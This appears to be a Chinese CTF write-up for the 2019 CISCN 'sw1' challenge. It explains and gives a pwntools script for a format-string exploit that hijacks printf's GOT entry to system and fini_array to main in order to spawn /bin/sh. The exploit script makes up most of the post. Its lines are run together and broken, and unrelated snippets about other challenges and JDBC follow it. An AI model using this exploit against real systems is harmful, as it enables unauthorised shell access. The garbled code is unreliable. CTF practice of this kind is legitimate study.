
2023-10-09 20:59
文章标签 2019 array ciscn fini sw1



​ 在执行main函数之前会调用init_array里的函数,在执行完main函数之后调用fini_array里的函数,因此这道题思路为通过第一次printf劫持printf的got表为system的函数地址,劫持fini_addr为main函数的地址,第二次输入"/bin/sh\x00",当执行到printf(“/bin/sh\x00”)时,由于劫持为system函数,因此执行system(“/bin/sh\x00”),拿到shell。



from pwn import *
from LibcSearcher import *file_path = "./chall/1"
local = 0
remote_path = ""
elf = ELF("./chall/1")
# libc = ELF("/usr/lib/x86_64-linux-gnu/")################################  forbidden ####################################
if local != 1:p = remote(remote_path.split(":")[0],int(remote_path.split(":")[1]))
else:p = process(file_path)sd      = lambda payload        : p.send(payload)
sdl     = lambda payload        : p.sendline(payload)
sda     = lambda data,payload   : p.sendafter(data,payload)
sdla    = lambda data,payload   : p.sendlineafter(data,payload)
it      = lambda                : p.interactive()
rcv     = lambda num            : p.recv(num)
rcv_all = lambda                : p.recv()
rcvu    = lambda data           : p.recvuntil(data)
lbc     = lambda str1,str2      : LibcSearcher(str1,str2)
lg      = lambda name,data      : p.success(name + "-> 0x%x" % data)#采用b *<addr>  b *$rebase(<addr>)下断点
def debug(a=''):if local:gdb.attach(p,a)if a=='':passelse: pass
################################  forbidden ####################################get_addr_64 = lambda: u64(rcvu(b"\x7f")[-6:].ljust(8,b"\x00"))############################################################################
##check: arch
##check: .so
if __name__ == "__main__":context(os='linux', arch='amd64', log_level='debug')debug("b *0x80485a8")sys_addr = 0x80483d0fini_addr = 0x804979cprintf_got = 0x804989cmain_addr = 0x8048534#更改fini_addr处为main函数地址,劫持printf got表为system函数payload = "%{}c%{}$hn%{}c%{}$hn%{}c%{}$hn".format(0x804,14,0x83d0-0x804,15,0x8534-0x83d0,13) payload = bytes(payload.encode("utf-8"))payload = payload + p32(fini_addr) + p32(printf_got+2) + p32(printf_got)rcv_all()payload = payload.ljust(32,b"a")sdl(payload)sleep(0.2)sdl(b"/bin/sh\x00")it()




BUUCTF靶场[web][极客大挑战 2019]Http、[HCTF 2018]admin

目录   [web][极客大挑战 2019]Http 考点:Referer协议、UA协议、X-Forwarded-For协议 [web][HCTF 2018]admin 考点:弱密码字典爆破 四种方法:   [web][极客大挑战 2019]Http 考点:Referer协议、UA协议、X-Forwarded-For协议 访问环境 老规矩,我们先查看源代码

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一个区间移动的问题,1A了,感觉没什么好说的。。 13975926 11536 Smallest Sub-Array Accepted C++ 0.809 2014-08-01 11:00:20 #include<cstdio>#include<cstring>#include<iostream>using namespace std;#define INF 1 << 30

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最简单的使用JDBC[连接数据库] mysql 2019年3月18日

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